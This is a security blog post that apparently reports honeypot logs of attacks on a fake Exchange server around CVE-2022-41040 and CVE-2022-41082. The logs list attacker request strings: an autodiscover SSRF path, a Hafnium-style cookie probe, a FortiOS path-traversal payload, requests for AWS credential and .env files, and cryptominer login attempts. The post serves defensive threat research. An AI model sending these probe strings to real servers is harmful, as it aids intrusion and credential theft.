Follow Us:

contact@wildptr.io

mobile-logo
 

Honeypotting for Exchange RCE’s & profit – Exchange Server recent Threats (CVE-20222-41040, CVE-2022-41082)

Wild Pointer > Malware Research  > Honeypotting for Exchange RCE’s & profit – Exchange Server recent Threats (CVE-20222-41040, CVE-2022-41082)
02 Oct

Honeypotting for Exchange RCE’s & profit – Exchange Server recent Threats (CVE-20222-41040, CVE-2022-41082)

by Barak Sternberg
in Malware Research, Security Research
Comments

This will be an updated list of threats being discovered available out there while honeypotting for the new CVE.

Part of the new CVE may require auth, and we can actually see here threat actors trying to check for auth-bypass

either using old vulnerabilities, e.g: CVE-2021-26855, or using other interesting checks, e.g: getting AWS creds

and from there trying to move forward.

*After we complete the research – we will publish that HoneyPot 🙂

  1. Hafnium APT tries-like for (Exchange CVE-2021-26855) – triggering check at “/owa/auth/x.js”

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2022-10-02 12:54:19,307 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 65.49.20.100
2022-10-02 12:54:19,307 – honeypot – DEBUG – Headers: Host: 3.75.137.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Encoding: gzip

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. zgrab application scanner –

2022-10-02 01:26:17,433 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 138.68.163.102
2022-10-02 01:26:17,433 – honeypot – DEBUG – Headers: Host: 3.75.137.138
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip

3. Bypass check for login with OWA creds (Probably)-

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2022-10-02 01:58:41,874 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.217.101
2022-10-02 01:58:41,874 – honeypot – DEBUG – Headers: Host: 3.75.137.138
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3. trying to get AWS credentials-

2022-10-02 07:21:33,197 – honeypot – DEBUG – LOGGING REQUEST: GET /.aws/config? 18.118.158.112
2022-10-02 07:21:33,197 – honeypot – DEBUG – Headers: Host: ec2-3-75-137-138.eu-central-1.compute.amazonaws.com
User-Agent: Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5
Accept-Charset: utf-8
Accept-Encoding: gzip
Connection: close

4. Trying to get details about the autodiscover utility (maybe to trigger further vulns)-

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2022-10-02 06:09:29,572 – honeypot – DEBUG – LOGGING REQUEST: GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application? 71.6.135.131
2022-10-02 06:09:29,572 – honeypot – DEBUG – Headers: Host: 3.75.137.138
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.27.1

5. Trying to trigger latest exchange CVE’s probably:

2022-10-04 15:31:30,013 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@1337.com/owa/?&Email=autodiscover/autodiscover.json%3F@1337.com 89.248.165.203

6. Trying to trigger FortiOS SSL VPN RCE (CVE-2018-13379)

2022-10-03 10:07:11,883 – honeypot – DEBUG – LOGGING REQUEST: GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 152.89.196.23

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Last Current logs:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

138.68.163.102 – – [01/Oct/2022 17:52:50] “GET /ab2g HTTP/1.1” 404 –
138.68.163.102 – – [01/Oct/2022 17:52:50] “GET /ab2h HTTP/1.1” 404 –
138.68.163.102 – – [01/Oct/2022 17:52:55] “GET / HTTP/1.1” 302 –
138.68.163.102 – – [01/Oct/2022 17:52:55] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
192.241.217.42 – – [01/Oct/2022 18:35:26] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
18.118.158.112 – – [01/Oct/2022 18:51:25] “GET /.aws/credentials HTTP/1.1” 404 –
192.241.218.64 – – [01/Oct/2022 19:35:52] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
192.241.220.237 – – [01/Oct/2022 21:06:32] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
87.236.176.244 – – [01/Oct/2022 22:06:34] “GET / HTTP/1.1” 302 –
138.68.163.102 – – [01/Oct/2022 22:10:36] “GET / HTTP/1.1” 302 –
138.68.163.102 – – [01/Oct/2022 22:10:36] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
43.131.66.209 – – [01/Oct/2022 22:23:26] “GET / HTTP/1.1” 302 –
192.241.219.215 – – [01/Oct/2022 23:44:33] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
128.14.134.134 – – [02/Oct/2022 01:01:59] “GET / HTTP/1.1” 302 –
128.14.134.134 – – [02/Oct/2022 01:02:00] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
138.68.163.102 – – [02/Oct/2022 01:26:17] “GET /ab2g HTTP/1.1” 404 –
138.68.163.102 – – [02/Oct/2022 01:26:17] “GET /ab2h HTTP/1.1” 404 –
192.241.217.101 – – [02/Oct/2022 01:58:41] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
198.235.24.144 – – [02/Oct/2022 02:48:40] “GET / HTTP/1.1” 302 –
198.235.24.144 – – [02/Oct/2022 02:48:40] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
192.241.203.30 – – [02/Oct/2022 03:00:12] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
162.221.192.26 – – [02/Oct/2022 04:27:51] “GET /admin/ HTTP/1.1” 404 –
172.105.161.142 – – [02/Oct/2022 05:03:40] “GET / HTTP/1.1” 302 –
172.105.161.142 – – [02/Oct/2022 05:03:41] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
71.6.135.131 – – [02/Oct/2022 06:09:14] “GET / HTTP/1.1” 302 –
71.6.135.131 – – [02/Oct/2022 06:09:14] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
71.6.135.131 – – [02/Oct/2022 06:09:23] SSL error occurred: [SSL: UNEXPECTED_RECORD] unexpected record (_ssl.c:2548)
71.6.135.131 – – [02/Oct/2022 06:09:27] “GET /robots.txt HTTP/1.1” 404 –
71.6.135.131 – – [02/Oct/2022 06:09:27] “GET /sitemap.xml HTTP/1.1” 404 –
71.6.135.131 – – [02/Oct/2022 06:09:28] “GET /.well-known/security.txt HTTP/1.1” 404 –
71.6.135.131 – – [02/Oct/2022 06:09:29] “GET /owa/auth/15.1.1466/themes/resources/favicon.ico HTTP/1.1” 200 –
71.6.135.131 – – [02/Oct/2022 06:09:29] “GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1” 200 –
71.6.135.131 – – [02/Oct/2022 06:09:30] “GET /owa/auth/x.js HTTP/1.1” 404 –
192.241.219.187 – – [02/Oct/2022 06:30:49] “GET / HTTP/1.1” 302 –
18.118.158.112 – – [02/Oct/2022 07:21:33] “GET /.aws/config HTTP/1.1” 404 –
20.113.29.76 – – [02/Oct/2022 07:25:11] “GET / HTTP/1.1” 302 –
34.76.158.233 – – [02/Oct/2022 07:58:54] “GET / HTTP/1.1” 302 –
167.99.217.36 – – [02/Oct/2022 09:28:54] “GET /ab2h HTTP/1.1” 404 –
167.99.217.36 – – [02/Oct/2022 09:28:59] “GET / HTTP/1.1” 302 –
167.99.217.36 – – [02/Oct/2022 09:29:00] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
65.49.20.68 – – [02/Oct/2022 12:42:00] “GET / HTTP/1.1” 302 –
65.49.20.84 – – [02/Oct/2022 12:44:59] “HEAD /owa/ HTTP/1.1” 404 –
65.49.20.72 – – [02/Oct/2022 12:46:32] “GET /owa/ HTTP/1.1” 404 –
65.49.20.100 – – [02/Oct/2022 12:54:19] “GET /owa/auth/x.js HTTP/1.1” 404 –
65.49.20.72 – – [02/Oct/2022 12:54:46] “GET / HTTP/1.1” 302 –
65.49.20.72 – – [02/Oct/2022 12:54:47] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
165.22.229.77 – – [02/Oct/2022 12:59:29] “GET / HTTP/1.1” 302 –
165.22.229.77 – – [02/Oct/2022 12:59:30] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –

71.6.135.131 – – [02/Oct/2022 06:09:29] “GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1” 200 –
71.6.135.131 – – [02/Oct/2022 06:09:30] “GET /owa/auth/x.js HTTP/1.1” 404 –
192.241.219.187 – – [02/Oct/2022 06:30:49] “GET / HTTP/1.1” 302 –
18.118.158.112 – – [02/Oct/2022 07:21:33] “GET /.aws/config HTTP/1.1” 404 –
20.113.29.76 – – [02/Oct/2022 07:25:11] “GET / HTTP/1.1” 302 –
34.76.158.233 – – [02/Oct/2022 07:58:54] “GET / HTTP/1.1” 302 –
167.99.217.36 – – [02/Oct/2022 09:28:54] “GET /ab2h HTTP/1.1” 404 –
167.99.217.36 – – [02/Oct/2022 09:28:59] “GET / HTTP/1.1” 302 –
167.99.217.36 – – [02/Oct/2022 09:29:00] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
65.49.20.68 – – [02/Oct/2022 12:42:00] “GET / HTTP/1.1” 302 –
65.49.20.84 – – [02/Oct/2022 12:44:59] “HEAD /owa/ HTTP/1.1” 404 –
65.49.20.72 – – [02/Oct/2022 12:46:32] “GET /owa/ HTTP/1.1” 404 –
65.49.20.100 – – [02/Oct/2022 12:54:19] “GET /owa/auth/x.js HTTP/1.1” 404 –
65.49.20.72 – – [02/Oct/2022 12:54:46] “GET / HTTP/1.1” 302 –
65.49.20.72 – – [02/Oct/2022 12:54:47] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
165.22.229.77 – – [02/Oct/2022 12:59:29] “GET / HTTP/1.1” 302 –
165.22.229.77 – – [02/Oct/2022 12:59:30] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
195.161.41.37 – – [02/Oct/2022 13:58:43] “GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1” 200 –
104.248.53.239 – – [02/Oct/2022 14:26:17] “POST / HTTP/1.1” 405 –
104.248.53.239 – – [02/Oct/2022 14:26:18] “GET /.env HTTP/1.1” 404 –
192.241.220.43 – – [02/Oct/2022 18:25:52] “GET /actuator/health HTTP/1.1” 404 –
45.148.120.191 – – [02/Oct/2022 19:38:18] code 400, message Bad request version (‘[“cpuminer/2.5.1”]}’)
45.148.120.191 – – [02/Oct/2022 19:38:18] “{“id”: 1, “method”: “mining.subscribe”, “params”: [“cpuminer/2.5.1″]}” HTTPStatus.BAD_REQUEST –
45.148.120.191 – – [02/Oct/2022 19:38:19] code 400, message Bad request version (‘”EthereumStratum/1.0.0″]}’)
45.148.120.191 – – [02/Oct/2022 19:38:19] “{“id”: 1, “method”: “mining.subscribe”, “params”: [“MinerName/1.0.0”, “EthereumStratum/1.0.0″]}” HTTPStatus.BAD_REQUEST –
45.148.120.191 – – [02/Oct/2022 19:38:19] code 400, message Bad request syntax (‘{“id”:1,”method”:”eth_submitLogin”,”worker”:”eth1.0″,”params”:[“0xf48294ad6dd4d60ed31568cdfea2f3d9ecf0591c”,”x”],”jsonrpc”:”2.0″}’)
45.148.120.191 – – [02/Oct/2022 19:38:19] “{“id”:1,”method”:”eth_submitLogin”,”worker”:”eth1.0″,”params”:[“0xf48294ad6dd4d60ed31568cdfea2f3d9ecf0591c”,”x”],”jsonrpc”:”2.0″}” HTTPStatus.BAD_REQUEST –
45.148.120.191 – – [02/Oct/2022 19:38:20] code 400, message Bad request version (‘msvc/2019″,”algo”:[“cn/1″,”cn/2″,”cn/r”,”cn/fast”,”cn/half”,”cn/xao”,”cn/rto”,”cn/rwz”,”cn/zls”,”cn/double”,”cn/ccx”,”cn-lite/1″,”cn-heavy/0″,”cn-heavy/tube”,”cn-heavy/xhv”,”cn-pico”,”cn-pico/tlo”,”cn/upx2″,”rx/0″,”rx/wow”,”rx/arq”,”rx/graft”,”rx/sfx”,”rx/keva”,”argon2/chukwa”,”argon2/chukwav2″,”argon2/ninja”,”astrobwt”]}}’)
45.148.120.191 – – [02/Oct/2022 19:38:20] “{“id”:1,”jsonrpc”:”2.0″,”method”:”login”,”params”:{“login”:”41uxebUUtLvNwxPpmRVNJaPfoTUr4nbkQFmNVwCN4pwy1j7vZRsquxca8H2S4teBaDiYth668m5GB8HusZ2rJti48GgZiHP”,”pass”:”x”,”agent”:”XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019″,”algo”:[“cn/1″,”cn/2″,”cn/r”,”cn/fast”,”cn/half”,”cn/xao”,”cn/rto”,”cn/rwz”,”cn/zls”,”cn/double”,”cn/ccx”,”cn-lite/1″,”cn-heavy/0″,”cn-heavy/tube”,”cn-heavy/xhv”,”cn-pico”,”cn-pico/tlo”,”cn/upx2″,”rx/0″,”rx/wow”,”rx/arq”,”rx/graft”,”rx/sfx”,”rx/keva”,”argon2/chukwa”,”argon2/chukwav2″,”argon2/ninja”,”astrobwt”]}}” HTTPStatus.BAD_REQUEST –
45.148.120.191 – – [02/Oct/2022 19:38:20] “GET / HTTP/1.1” 302 –
45.148.120.191 – – [02/Oct/2022 19:38:20] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
45.148.120.191 – – [02/Oct/2022 19:38:21] “POST / HTTP/1.1” 405 –
45.148.120.191 – – [02/Oct/2022 19:38:21] “POST / HTTP/1.1” 405 –
45.148.120.191 – – [02/Oct/2022 19:38:21] “GET /WuEL HTTP/1.1” 404 –
45.148.120.191 – – [02/Oct/2022 19:38:22] “GET /a HTTP/1.1” 404 –
45.148.120.191 – – [02/Oct/2022 19:38:22] “GET /download/file.ext HTTP/1.1” 404 –
45.148.120.191 – – [02/Oct/2022 19:38:23] “GET /SiteLoader HTTP/1.1” 404 –
45.148.120.191 – – [02/Oct/2022 19:38:23] “GET /mPlayer HTTP/1.1” 404 –
192.241.220.240 – – [02/Oct/2022 19:41:19] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
18.118.158.112 – – [02/Oct/2022 19:52:22] “GET /aws/credentials HTTP/1.1” 404 –
205.210.31.139 – – [02/Oct/2022 20:06:04] “GET / HTTP/1.1” 302 –
205.210.31.139 – – [02/Oct/2022 20:06:05] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
192.241.219.128 – – [02/Oct/2022 20:08:19] “GET /owa/auth/x.js HTTP/1.1” 404 –
192.241.219.55 – – [02/Oct/2022 21:02:07] “GET /owa/auth/logon.aspx HTTP/1.1” 200 –
192.241.218.58 – – [02/Oct/2022 21:04:17] “GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1” 200 –
128.14.134.134 – – [02/Oct/2022 22:04:00] “GET / HTTP/1.1” 302 –
128.14.134.134 – – [02/Oct/2022 22:04:00] “GET /owa/auth/logon.aspx?replaceCurrent=1&url= HTTP/1.1” 200 –
192.241.217.23 – – [02/Oct/2022 22:16:23] “GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1” 200 –
142.93.157.28 – – [02/Oct/2022 22:46:36] “GET /ab2g HTTP/1.1” 404 –
142.93.157.28 – – [02/Oct/2022 22:46:36] “GET /ab2h HTTP/1.1” 404 –
142.93.157.28 – – [02/Oct/2022 22:46:37] “GET / HTTP/1.1” 302
2022-10-01 17:35:42,174 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/UnifiedMessagin/inside/loggedin/logged/ok? 77.124.170.203
2022-10-01 17:35:46,790 – honeypot – DEBUG – LOGGING REQUEST: GET /? 77.124.170.203
2022-10-01 17:35:47,174 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 77.124.170.203
2022-10-01 17:35:47,710 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-01 17:35:50,414 – honeypot – DEBUG – LOGGING REQUEST: POST /owa/auth.owa? 77.124.170.203
2022-10-01 17:35:50,790 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/UnifiedMessagin/inside/loggedin/logged/ok? 77.124.170.203
2022-10-01 17:37:49,659 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/UnifiedMessagin/inside/loggedin/logged/ok? 77.124.170.203
2022-10-01 17:52:50,356 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 138.68.163.102
2022-10-01 17:52:50,475 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 138.68.163.102
2022-10-01 17:52:55,274 – honeypot – DEBUG – LOGGING REQUEST: GET /? 138.68.163.102
2022-10-01 17:52:55,452 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 138.68.163.102
2022-10-01 18:35:26,025 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.217.42
2022-10-01 18:51:25,642 – honeypot – DEBUG – LOGGING REQUEST: GET /.aws/credentials? 18.118.158.112
2022-10-01 19:35:52,672 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.218.64
2022-10-01 21:06:32,141 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.220.237
2022-10-01 22:06:34,869 – honeypot – DEBUG – LOGGING REQUEST: GET /? 87.236.176.244
2022-10-01 22:10:36,686 – honeypot – DEBUG – LOGGING REQUEST: GET /? 138.68.163.102
2022-10-01 22:10:36,844 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 138.68.163.102
2022-10-01 22:23:26,470 – honeypot – DEBUG – LOGGING REQUEST: GET /? 43.131.66.209
2022-10-01 23:44:33,131 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.219.215
2022-10-02 01:01:59,856 – honeypot – DEBUG – LOGGING REQUEST: GET /? 128.14.134.134
2022-10-02 01:02:00,469 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 128.14.134.134
2022-10-02 01:26:17,433 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 138.68.163.102
2022-10-02 01:26:17,556 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 138.68.163.102
2022-10-02 01:58:41,874 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.217.101
2022-10-02 02:48:40,582 – honeypot – DEBUG – LOGGING REQUEST: GET /? 198.235.24.144
2022-10-02 02:48:40,670 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 198.235.24.144
2022-10-02 03:00:12,902 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.203.30
2022-10-02 04:27:51,209 – honeypot – DEBUG – LOGGING REQUEST: GET /admin/? 162.221.192.26
2022-10-02 05:03:40,585 – honeypot – DEBUG – LOGGING REQUEST: GET /? 172.105.161.142
2022-10-02 05:03:41,621 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 172.105.161.142
2022-10-02 06:09:14,307 – honeypot – DEBUG – LOGGING REQUEST: GET /? 71.6.135.131
2022-10-02 06:09:14,964 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 71.6.135.131
2022-10-02 06:09:27,250 – honeypot – DEBUG – LOGGING REQUEST: GET /robots.txt? 71.6.135.131
2022-10-02 06:09:27,855 – honeypot – DEBUG – LOGGING REQUEST: GET /sitemap.xml? 71.6.135.131
2022-10-02 06:09:28,481 – honeypot – DEBUG – LOGGING REQUEST: GET /.well-known/security.txt? 71.6.135.131
2022-10-02 06:09:29,056 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 71.6.135.131
2022-10-02 06:09:29,572 – honeypot – DEBUG – LOGGING REQUEST: GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application? 71.6.135.131
2022-10-02 06:09:30,038 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 71.6.135.131
2022-10-02 06:30:49,577 – honeypot – DEBUG – LOGGING REQUEST: GET /? 192.241.219.187
2022-10-02 07:21:33,197 – honeypot – DEBUG – LOGGING REQUEST: GET /.aws/config? 18.118.158.112
2022-10-02 07:25:11,850 – honeypot – DEBUG – LOGGING REQUEST: GET /? 20.113.29.76
2022-10-02 07:58:54,485 – honeypot – DEBUG – LOGGING REQUEST: GET /? 34.76.158.233
2022-10-02 09:28:54,767 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 167.99.217.36
2022-10-02 09:28:59,996 – honeypot – DEBUG – LOGGING REQUEST: GET /? 167.99.217.36
2022-10-02 09:29:00,193 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 167.99.217.36
2022-10-02 12:42:00,570 – honeypot – DEBUG – LOGGING REQUEST: GET /? 65.49.20.68
2022-10-02 12:44:59,789 – honeypot – DEBUG – LOGGING REQUEST: HEAD /owa/? 65.49.20.84
2022-10-02 12:46:32,019 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 65.49.20.72
2022-10-02 12:54:19,307 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 65.49.20.100
2022-10-02 12:54:46,214 – honeypot – DEBUG – LOGGING REQUEST: GET /? 65.49.20.72
2022-10-02 12:54:47,333 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 65.49.20.72
2022-10-02 12:59:29,607 – honeypot – DEBUG – LOGGING REQUEST: GET /? 165.22.229.77
2022-10-02 12:59:30,040 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 165.22.229.77
2022-10-02 13:58:43,462 – honeypot – DEBUG – LOGGING REQUEST: GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com 195.161.41.37
2022-10-02 14:26:17,930 – honeypot – DEBUG – LOGGING REQUEST: POST /? 104.248.53.239
2022-10-02 14:26:18,699 – honeypot – DEBUG – LOGGING REQUEST: GET /.env? 104.248.53.239
2022-10-02 18:25:52,358 – honeypot – DEBUG – LOGGING REQUEST: GET /actuator/health? 192.241.220.43
2022-10-02 19:38:20,372 – honeypot – DEBUG – LOGGING REQUEST: GET /? 45.148.120.191
2022-10-02 19:38:20,702 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 45.148.120.191
2022-10-02 19:38:21,048 – honeypot – DEBUG – LOGGING REQUEST: POST /? 45.148.120.191
2022-10-02 19:38:21,409 – honeypot – DEBUG – LOGGING REQUEST: POST /? 45.148.120.191
2022-10-02 19:38:21,769 – honeypot – DEBUG – LOGGING REQUEST: GET /WuEL? 45.148.120.191
2022-10-02 19:38:22,304 – honeypot – DEBUG – LOGGING REQUEST: GET /a? 45.148.120.191
2022-10-02 19:38:22,612 – honeypot – DEBUG – LOGGING REQUEST: GET /download/file.ext? 45.148.120.191
2022-10-02 19:38:23,012 – honeypot – DEBUG – LOGGING REQUEST: GET /SiteLoader? 45.148.120.191
2022-10-02 19:38:23,439 – honeypot – DEBUG – LOGGING REQUEST: GET /mPlayer? 45.148.120.191
2022-10-02 19:41:19,006 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.220.240
2022-10-02 19:52:22,232 – honeypot – DEBUG – LOGGING REQUEST: GET /aws/credentials? 18.118.158.112
2022-10-02 20:06:04,470 – honeypot – DEBUG – LOGGING REQUEST: GET /? 205.210.31.139
2022-10-02 20:06:05,280 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 205.210.31.139
2022-10-02 20:08:19,528 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/x.js? 192.241.219.128
2022-10-02 21:02:07,625 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx? 192.241.219.55
2022-10-02 21:04:17,226 – honeypot – DEBUG – LOGGING REQUEST: GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application? 192.241.218.58
2022-10-02 22:04:00,153 – honeypot – DEBUG – LOGGING REQUEST: GET /? 128.14.134.134
2022-10-02 22:04:00,790 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?replaceCurrent=1&url= 128.14.134.134
2022-10-02 22:16:23,084 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 192.241.217.23
2022-10-02 22:46:36,327 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2g? 142.93.157.28
2022-10-02 22:46:36,817 – honeypot – DEBUG – LOGGING REQUEST: GET /ab2h? 142.93.157.28
2022-10-02 22:46:37,300 – honeypot – DEBUG – LOGGING REQUEST: GET /? 142.93.157.28
2022-10-02 23:12:36,667 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:13:53,004 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:14:13,549 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:14:14,352 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:14:33,968 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/asdsada? 77.124.170.203
2022-10-02 23:14:36,446 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/? 77.124.170.203
2022-10-02 23:14:36,986 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:14:39,262 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/asdasd? 77.124.170.203
2022-10-02 23:14:40,740 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/asdasd? 213.151.35.135
2022-10-02 23:14:44,234 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:14:47,184 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 62.0.80.7
2022-10-02 23:15:14,275 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:15:14,850 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:15:56,343 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/asdsada? 194.90.196.132
2022-10-02 23:19:06,112 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:19:06,675 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:19:07,188 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
2022-10-02 23:21:11,167 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/? 77.124.170.203
2022-10-02 23:21:11,727 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/segoeui-regular.ttf? 77.124.170.203
2022-10-02 23:21:12,249 – honeypot – DEBUG – LOGGING REQUEST: GET /owa/auth/15.1.1466/themes/resources/favicon.ico? 77.124.170.203
